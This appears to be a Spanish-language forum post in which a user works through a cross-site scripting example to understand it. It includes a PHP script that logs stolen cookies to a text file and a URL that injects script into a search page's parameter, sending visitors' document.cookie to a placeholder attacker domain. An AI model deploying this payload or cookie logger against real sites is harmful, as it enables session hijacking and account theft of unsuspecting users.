respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie
cookies.php
Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>
ahora viene so esta claro lo del archivo.txt que se deposita la cokie alli tambiene sta caro
pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi en este formato lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form
aqui mi duda entonces l primer cgi seria buscador.php
ahora la primera pareja seria
palabra=<script>window.location='
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
y la segunda pareja seria
buscar=;
ahora analizando la primera pareja checamos esta parte
'
http://www.atacante.com/cookies.php?cookie='+document.cookieahora en esto el cgi seria cookies.php
y su pareja seria cookie='+document.cookie
ahora sia lguien postea las fuentes de buscador.php seria buenisimo igual la voya buscar supongo que eso nos aclararia bastante loq ue hace esa url
buenoo voya buscar ciao
9reynas
de ante mano si me equivoco en algo corriganme y nada salu2
Autor
En línea
